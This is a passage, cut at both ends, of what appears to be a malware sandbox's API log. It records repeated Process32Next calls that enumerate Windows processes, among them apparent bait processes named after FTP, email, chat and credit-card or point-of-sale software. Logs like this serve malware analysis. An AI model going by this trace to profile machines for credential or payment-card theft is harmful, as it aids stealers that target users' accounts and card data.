lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.675] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.677] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.679] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.681] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.682] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.684] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.686] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.688] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.689] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.691] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.693] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.694] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.809] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.812] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.814] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.817] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.820] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.822] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.824] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0244.826] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.829] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0244.832] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.835] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0244.837] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0244.839] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0244.841] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0244.842] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0244.844] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0244.947] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.949] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.951] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0244.953] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.969] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.973] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.975] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.978] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.980] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0244.982] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0244.985] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0244.987] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0244.989] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0244.991] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0244.992] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0244.994] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0244.996] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0245.094] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0245.097] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0245.099] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0245.101] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0245.105] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0245.108] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0245.110] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0245.113] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0245.115] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0245.200] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0245.203] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0245.207] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0245.210] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0245.261] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0245.266] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0245.270] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0245.273] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0245.275] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0245.278] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0245.281] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0245.284] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0245.287] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0245.290] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0245.293] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0245.297] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0245.343] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0245.346] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0245.349] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0245.352] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0245.354] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0245.357] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0245.360] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0245.363] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0245.366] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0245.368] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0245.371] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0245.375] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0245.377] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0245.425] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0245.428] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: 